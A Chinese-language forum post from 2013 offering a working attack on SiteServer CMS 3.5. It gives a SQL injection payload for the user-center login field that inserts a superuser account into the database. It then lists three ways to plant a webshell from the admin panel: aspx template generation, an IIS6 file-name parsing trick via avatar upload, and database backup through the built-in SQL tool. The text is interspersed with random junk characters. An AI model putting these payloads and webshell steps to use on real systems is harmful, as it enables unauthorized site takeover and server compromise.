经测试秒杀最新的3.5版+ c2 d1 E* n5 a2 [* B2 V
stieserver官网:www.siteserver.cn
' r! m* v5 ^+ Z5 [. pEXP:0 G0 q9 B' _) z& B
直接访问UserCenter/login.aspx
8 ]. E% ~( R. e1 l2 X用户名处输入:
/ W" _8 X: J* V. F1 Z& ~4 x1 B8 R( O. C% O
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
0 r2 O# a' t* f7 i密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
* |3 L, o( A* D5 _+ p: D% H之后再访问后台SiteServer/login.aspx用插入的用户登陆
* P6 w0 q/ c+ Y3 `( x! U后台拿webshell的三种方法:- }6 N, w c" ^: Q: K
一、6 Y% \9 p# t- W6 @
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
( |5 c. W2 `/ B1 N& B# c二、
: @6 p6 K Z3 V6 j' x! k* y成员权限-》添加用户-》用户名为:1.asp5 e; k9 p# {' L7 W3 X* y& Q' o
http://127.0.0.1/usercenter/, |1 `1 [/ ^, K& ?4 Y* v- O
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell' h) o& L" x- C% m
(ps:后台添加用户时不会验证是否含有非法字符)
/ `% j$ K {/ O1 @5 e$ A( p2 ?& e三、
) u# r9 f/ t1 f) ?6 b) `系统工具-》实用工具-》机器参数查看4 y6 t- H% i* o1 ^ [
可以看到数据库类型、名称,WEB路径
9 {* d% i3 C6 j/ R: T系统工具-》数据库工具-》SQL语句查询
6 j6 O4 U D/ W! D3 U2 K* Y这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
分享
支持
反对